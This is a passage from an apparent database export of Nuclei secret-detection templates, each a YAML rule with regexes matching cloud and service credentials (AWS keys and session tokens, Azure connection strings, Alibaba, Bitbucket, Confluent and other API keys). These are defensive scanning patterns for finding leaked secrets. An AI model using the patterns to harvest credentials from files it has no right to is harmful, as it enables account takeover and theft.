https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adobe-client-id.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/adobe-client-id.go\n metadata:\n verified: true\n tags: keys,file,adobe,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:adobe)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-f0-9]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 490a00463044022007eda94aded10055c992548f92f163ce142cfa63312df87ab1913d55655c84a402205cfb63b7803c40be56e370f98a2541ef20c37455b0b0f136a5c19164ee802429:922c64590222798bb761d5b6d8e72950", "hash": "441adc145efd15d00b53db1bd740a2e7", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d13" }, "name": "adobe-secret.yaml", "content": "id: adobe-secret\n\ninfo:\n name: Adobe OAuth Client Secret\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/adobe.yml\n - https://developer.adobe.com/developer-console/docs/guides/authentication/\n - https://developer.adobe.com/developer-console/docs/guides/authentication/OAuthIntegration/\n - https://developer.adobe.com/developer-console/docs/guides/authentication/OAuth/\n metadata:\n verified: true\n tags: file,keys,adobe,oauth,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '(?i)\\b(p8e-[a-z0-9-]{32})(?:[^a-z0-9-]|$)'\n# digest: 4a0a00473045022100fbb2a00c904fe46b3138bc5a79cd5d3e108bf9a7ce64db4d82a47a40b4edfc7e022036f0b1d84e6bbde773bd90b9021e8202465c54346d9f1436af84e622a119114a:922c64590222798bb761d5b6d8e72950", "hash": "4ccca4ece4d491eb9938b8d212094560", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d14" }, "name": "age-identity-secret-key.yaml", "content": "id: age-identity-secret-key\n\ninfo:\n name: Age 
Identity (X22519 secret key)\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/age.yml\n - https://github.com/FiloSottile/age/blob/main/doc/age.1.html\n - https://github.com/C2SP/C2SP/blob/8b6a842e0360d35111c46be2a8019b2276295914/age.md#the-x25519-recipient-type\n metadata:\n verified: true\n tags: file,keys,age-encryption,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '\\bAGE-SECRET-KEY-1[0-9A-Z]{58}\\b'\n# digest: 4a0a00473045022100967a33608a1ecaa232719a64590ae179e82473d9ff9960e1294033f41dcfafb3022011659ec4586dff37d9381700897e858d37c2b363d718315d96fa9db721bc7123:922c64590222798bb761d5b6d8e72950", "hash": "bd1fa6eb5b589c4f3d0a53bcea8a4aa0", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d15" }, "name": "age-recipient-public-key.yaml", "content": "id: age-recipient-public-key\n\ninfo:\n name: Age Recipient (X25519 public key)\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/age.yml\n - https://github.com/FiloSottile/age/blob/main/doc/age.1.html\n - https://github.com/C2SP/C2SP/blob/8b6a842e0360d35111c46be2a8019b2276295914/age.md#the-x25519-recipient-type\n metadata:\n verified: true\n tags: file,keys,age-encryption,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '\\bage1[0-9a-z]{58}\\b'\n# digest: 4b0a004830460221008efb372243352ac7767832750aa04221c747bfb407e0d3599f6716055832807402210084c3968cf28f080a9a1ef95e6cd8a9029e85c7fa0d051df56217ecc16d6aafb9:922c64590222798bb761d5b6d8e72950", "hash": "15f4f31805540b183c4a124a03933ecb", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d16" }, "name": "alibaba-key-id.yaml", "content": "id: alibaba-key-id\n\ninfo:\n name: Alibaba Access Key ID\n author: DhiyaneshDK\n severity: info\n reference:\n 
- https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-access-key-id.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-access-key-id.go\n metadata:\n verified: true\n tags: alibaba,access,file,keys\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)\\b((LTAI)(?i)[a-z0-9]{20})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 490a0046304402202a929c5a7c56fdcba6baf8a05f5ee26de1dc68039a330a33dba7e6973876605b0220499fe8d24c2d03e30f7ffa4077775380ea6b237262bfdc1319821135d3bf0faf:922c64590222798bb761d5b6d8e72950", "hash": "8cfc291d81e23fd52403b05e454ed8d9", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d17" }, "name": "alibaba-secret-id.yaml", "content": "id: alibaba-secret-id\n\ninfo:\n name: Alibaba Secret Key ID\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-secret-key.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/alibaba-secret-key.go\n metadata:\n verified: true\n tags: alibaba,secret,file,keys\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:alibaba)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{30})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4b0a0048304602210087f98e454e5064757753028db3f4a280d96ee2ba47163b503031bb9000820d73022100f8348ca58ad2ee80dba4b7ccbca37a95b7ba44742a4f0ed2f5fd64b952843ef1:922c64590222798bb761d5b6d8e72950", "hash": "b586aa1ea9a912a35294c988018d9673", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d18" }, "name": "amazon-account-id.yaml", "content": "id: amazon-account-id\n\ninfo:\n name: Amazon Web Services Account ID - Detect\n author: DhiyaneshDK\n severity: info\n description: 
Amazon Web Services Account ID token was detected.\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/aws.yml\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n metadata:\n verified: true\n tags: file,keys,aws,amazon,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '(?i)aws_?(?:account)_?(?:id)?[\"''`]?\\s{0,30}(?::|=>|=)\\s{0,30}[\"''`]?([0-9]{4}-?[0-9]{4}-?[0-9]{4})'\n\n# Enhanced by md on 2023/05/04\n# digest: 4b0a00483046022100ad930551f3063ad8ee7027d7e0af408452b42a4dc33ba7a99e5bcbcf845c7e05022100b1d4fcc47c2ae007d17b06c945a91c56d8f4f5166d69688d8707bc4fcb69266e:922c64590222798bb761d5b6d8e72950", "hash": "988133104978b3699f0070e31285cf98", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d19" }, "name": "amazon-mws-auth-token.yaml", "content": "id: amazon-mws-auth-token-value\n\ninfo:\n name: Amazon MWS Authentication Token - Detect\n author: gaurang\n severity: medium\n description: Amazon MWS authentication token was detected.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cwe-id: CWE-200\n tags: file,keys,token,amazon,auth,mws\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"amzn\\\\.mws\\\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}\"\n# digest: 4a0a00473045022100c334a6bda970ddcb70079df2f8a9a1769a7104636a611691c28787921fc2a1a102200bfe666c925c702093688b5f70b29028fa8c8c92c8b739cee1eaaa3a92144494:922c64590222798bb761d5b6d8e72950", "hash": "876dfb7a3e43d5d938b1b6024060f0e9", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d1a" }, "name": "amazon-session-token.yaml", "content": "id: amazon-session-token\n\ninfo:\n name: Amazon Session Token - Detect\n author: DhiyaneshDK\n severity: info\n description: Amazon session token was detected.\n 
reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/aws.yml\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n metadata:\n verified: true\n tags: file,keys,aws,amazon,token,session\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - '(?i)(?:aws.?session|aws.?session.?token|aws.?token)[\"''`]?\\s{0,30}(?::|=>|=)\\s{0,30}[\"''`]?([a-z0-9/+=]{16,200})[^a-z0-9/+=]'\n\n# Enhanced by md on 2023/05/04\n# digest: 4a0a00473045022012a50d46848dcc172a05c5e2fd88e802af8022bf13ab09dbf8740ae3ad5855f5022100c16953404125451a8cfc4ed26412b99b0d25c02e73a6c7ba8337a905c7e2efa9:922c64590222798bb761d5b6d8e72950", "hash": "2ccd1bf9c787333ce0104fc7d3134a50", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d1b" }, "name": "amazon-sns-token.yaml", "content": "id: amazon-sns-token\n\ninfo:\n name: Amazon SNS Token - Detect\n author: TheBinitGhimire\n severity: info\n description: Amazon SNS token was detected.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: file,keys,token,amazon,aws,sns\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n name: amazon-sns-topic\n regex:\n - 'arn:aws:sns:[a-z0-9\\-]+:[0-9]+:[A-Za-z0-9\\-_]+'\n\n# Enhanced by md on 2023/05/04\n# digest: 490a0046304402207e55ee87e40a2d4d85bcc06d548501b06c21297fdc881073d65676a4819deca30220739ca22a94917910a17365d5f3118dc91aec1092877dc91905cc1f2a0458100d:922c64590222798bb761d5b6d8e72950", "hash": "74588b07b62ce5bce35e0e361489efc8", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d1c" }, "name": "aws-access-id.yaml", "content": "id: aws-access-key\n\ninfo:\n name: Amazon Web Services Access Key ID - Detect\n author: gaurang\n severity: info\n description: Amazon Web Services Access Key ID token was detected.\n classification:\n 
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: file,keys,token,aws,amazon\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"(A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16}\"\n# digest: 4a0a0047304502204131589055933e9abecb047239e920aaa9798065f2947a61b8a2ddd8be6fa73a0221009f95d88336637ef94923f4724a94bf96e48debf07677bae0fa3a2e6988751396:922c64590222798bb761d5b6d8e72950", "hash": "209c9e11d9ba327dfd951732300c312b", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d1d" }, "name": "aws-cognito.yaml", "content": "id: aws-cognito-pool\n\ninfo:\n name: Amazon Web Services Cognito Pool ID - Detect\n author: gaurang\n severity: info\n description: Amazon Web Services Cognito Pool ID token was detected.\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N\n cvss-score: 0\n cwe-id: CWE-200\n tags: file,keys,token,aws,amazon\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n regex:\n - \"ap-northeast-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"ap-northeast-3:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"ap-southeast-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"ap-southeast-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"ap-south-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"ca-central-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"ca-central-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"eu-west-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"eu-west-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - 
\"eu-west-3:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"eu-west-3:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"eu-north-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"us-east-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"us-east-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"us-west-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"us-west-2:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n - \"sa-east-1:[0-9A-Za-z]{8}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{4}-[0-9A-Za-z]{12}\"\n# digest: 4a0a0047304502210090ee38d9121141c817986346c8a6e0c5910ee05a6cef57dc63ca444a691e292902203a724d1adda15bb0aa60207d79057c6cf7dc3c84bc929f9bf50b34f314fef15d:922c64590222798bb761d5b6d8e72950", "hash": "0ef859a0d197a1fd985e1691c67eaca7", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d1e" }, "name": "asana-clientid.yaml", "content": "id: asana-clientid\n\ninfo:\n name: Asana Client ID\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-id.go\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-id.yaml\n metadata:\n verified: true\n tags: asana,client,file,keys\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:asana)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([0-9]{16})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4a0a00473045022100ee80a7c2a35b34bc0d48c69c1e26169ef5a2181505d3836e47974bc04e41fbde0220796c13e9c14005e438971b5e1aa2f241fb1a2736a98df48c1acc98e50b1562b9:922c64590222798bb761d5b6d8e72950", "hash": 
"34efbf9c81dd7282ffe09e0445e5efca", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d1f" }, "name": "asana-clientsecret.yaml", "content": "id: asana-clientsecret\n\ninfo:\n name: Asana Client Secret\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-secret.go\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/asana-client-secret.yaml\n metadata:\n verified: true\n tags: asana,client,file,keys,secret\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:asana)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4b0a00483046022100a61527e5da6fb4b6f5e194679ac675364422d0a7a09fef2ed10c8d3982694d55022100a24d80c553e4d28e07ce752f5ab161faff53f39ea00a37ea4872f3c8564c4f6d:922c64590222798bb761d5b6d8e72950", "hash": "a9526c13769273157f657e241b7a0c85", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d20" }, "name": "atlassian-api-token.yaml", "content": "id: atlassian-api-token\n\ninfo:\n name: Atlassian API Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/atlassian-api-token.go\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/atlassian-api-token.yaml\n metadata:\n verified: true\n tags: file,keys,atlassian,token,api\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:atlassian|confluence|jira)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{24})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 
490a0046304402205433d3902cf7e3c7635bf23232f379b1aef00a5392fd97cd14771a114acd0a3902204babacddd38ce1156ad037e03c2f52b998acc6da7448013a7d6489edafd42644:922c64590222798bb761d5b6d8e72950", "hash": "d23874d98e5c3456c09e85e2e95061b0", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d21" }, "name": "azure-connection-string.yaml", "content": "id: azure-connection-string\n\ninfo:\n name: Azure Connection String\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/rules/azure.yml\n - https://azure.microsoft.com/en-us/blog/windows-azure-web-sites-how-application-strings-and-connection-strings-work/\n - https://docs.microsoft.com/en-us/azure/storage/common/storage-configure-connection-string\n metadata:\n verified: true\n tags: file,keys,azure,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:AccountName|SharedAccessKeyName|SharedSecretIssuer)\\s*=\\s*([^;]{1,80})\\s*;\\s*.{0,10}\\s*(?:AccountKey|SharedAccessKey|SharedSecretValue)\\s*=\\s*([^;]{1,100})(?:;|$)\n# digest: 490a004630440220680a55e8f1637508067947365d16659ebab85715a5b72613a39a14ac532914d702200a85b3b169d8acce55b4c33ebac26467defc1310779b3b16244675de92908777:922c64590222798bb761d5b6d8e72950", "hash": "51ef042d625d68854355614392f1266a", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d22" }, "name": "bitbucket-client-id.yaml", "content": "id: bitbucket-client-id\n\ninfo:\n name: BitBucket Client ID\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-id.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-id.go\n metadata:\n verified: true\n tags: file,keys,bitbucket,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: 
body\n regex:\n - (?i)(?:bitbucket)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4a0a0047304502201417604f83b80d514451141d4ae98b8b004d867c152282e139b7a294f55ac7af022100efab4733e59dc11e40c5cdfb08ab7409cf4a52bfe29eb62ebd63899ed943ff1d:922c64590222798bb761d5b6d8e72950", "hash": "6d8a9392b36602cd53c68aa5f951adf9", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d23" }, "name": "bitbucket-client-secret.yaml", "content": "id: bitbucket-client-secret\n\ninfo:\n name: BitBucket Client Secret\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-secret.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bitbucket-client-secret.go\n metadata:\n verified: true\n tags: keys,file,bitbucket,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:bitbucket)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9=_\\-]{64})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4a0a00473045022030dd4c8ba7ac15cf49da8046aa615f90ad0ca7bf9eb598d39ec8bac6bbbf17640221009bafe394c64b827479ac32383647bab0117a309f7c071f43399fddd575648bad:922c64590222798bb761d5b6d8e72950", "hash": "04cd580abc4c8851f56b0ed9a1705ea7", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d24" }, "name": "bittrex-access-key.yaml", "content": "id: bittrex-access-key\n\ninfo:\n name: Bittrex Access Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-access-key.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-access-key.go\n metadata:\n verified: 
true\n tags: file,keys,bittrex,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:bittrex)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4a0a00473045022021ae3b7bce6c874e3e9933741ecdd4a2950a724f5db03308c3d049b7fc8e3be0022100e2d9f990ba789c6f762dbfd3b566867d99336ef9f7be3b21f08fbb17cbd7e74d:922c64590222798bb761d5b6d8e72950", "hash": "9fe1aa1d8a030ac12a5d54f71c82d493", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d25" }, "name": "bittrex-secret-key.yaml", "content": "id: bittrex-secret-key\n\ninfo:\n name: Bittrex Secret Key\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-secret-key.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/bittrex-secret-key.go\n metadata:\n verified: true\n tags: file,keys,bittrex,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:bittrex)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{32})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4b0a0048304602210080c3ff4f4d8f64380bbd4965cc0bf17aee48eec5d25f16020cd6c07a12e5a070022100f9df5e67a69fbd471e028a1fbe6e58159fc49c126517256fc1eeb86a0a25771d:922c64590222798bb761d5b6d8e72950", "hash": "9d24b21f6f3d8468dc71b85d7d6d7eed", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d26" }, "name": "confluent-access-token.yaml", "content": "id: confluent-access-token\n\ninfo:\n name: Confluent Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-access-token.yaml\n - 
https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-access-token.go\n metadata:\n verified: true\n tags: file,keys,confluent,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:confluent)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{16})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 4a0a00473045022052eb9ef8330fc9119a458e687bfca7793b685ce74eddc06240c335e7c96a99bc022100c61c476b70924ed367251bd8c85ee9f3afa3d2eea7f7615a84a946483f5b4c0c:922c64590222798bb761d5b6d8e72950", "hash": "4a889a39874590f49fd5f1c0cafd2c2e", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d27" }, "name": "confluent-secret-token.yaml", "content": "id: confluent-secret-token\n\ninfo:\n name: Confluent Secret Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-secret-key.yaml\n - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/confluent-secret-key.go\n metadata:\n verified: true\n tags: file,keys,confluent,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)(?:confluent)(?:[0-9a-z\\-_\\t .]{0,20})(?:[\\s|']|[\\s|\"]){0,3}(?:=|>|:=|\\|\\|:|<=|=>|:)(?:'|\\\"|\\s|=|\\x60){0,5}([a-z0-9]{64})(?:['|\\\"|\\n|\\r|\\s|\\x60|;]|$)\n# digest: 490a00463044022007beb1f0b9057e5ecc0720838d8231c8e9ea04a7fe980a69a2bb92d2242a6ee90220521bc9d4be872b1d912312e2eb03e3e3dba550f0963fadf6eabfb4742fc72d2f:922c64590222798bb761d5b6d8e72950", "hash": "0eafd6bb2c48b8f8dbd157e028e22096", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d28" }, "name": "dependency-track.yaml", "content": "id: dependency-track\n\ninfo:\n name: Dependency Track API Key\n author: DhiyaneshDK\n severity: info\n reference:\n - 
https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/builtin/rules/dependency_track.yml\n - https://docs.dependencytrack.org/integrations/rest-api/\n - https://docs.dependencytrack.org/getting-started/configuration/\n metadata:\n verified: true\n max-request: 1\n tags: dependency,keys,file\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - \\b(odt_[A-Za-z0-9]{32,255})\\b\n# digest: 4a0a004730450220702a4c3c4219c5f6c449c503a1ada1924589fe8a8ee69ca9788a4fd1da542a7f022100c396ad3ca884547cbb32a55a497a33e09e9d592987536b27742dae33485e1abf:922c64590222798bb761d5b6d8e72950", "hash": "9d0265048e0d91580fc30906c4481219", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d29" }, "name": "digitalocean-access-token.yaml", "content": "id: digitalocean-personal-token\n\ninfo:\n name: DigitalOcean Personal Access Token\n author: DhiyaneshDK\n severity: info\n reference:\n - https://github.com/praetorian-inc/noseyparker/blob/main/crates/noseyparker/data/default/rules/digitalocean.yml\n - https://docs.digitalocean.com/reference/api/\n metadata:\n verified: true\n tags: keys,file,digitalocean,token\n\nfile:\n - extensions:\n - all\n\n extractors:\n - type: regex\n part: body\n regex:\n - (?i)\\b(doo_v1_[a-f0-9]{64})\\b\n# digest: 4a0a0047304502201ccaf3d5a659a1894d1c7a03933525e497128dcc3bf18923983865cbc0589f4f022100d373d44b781d6d17d86eb95e98b1293ea6fe64100591124dc0aba8caa73c600e:922c64590222798bb761d5b6d8e72950", "hash": "cde2a1d636ea472c821c3526e2234402", "level": 2, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307d2a" }, "name": "digitalocean-personal-access.yaml", "content": "id: 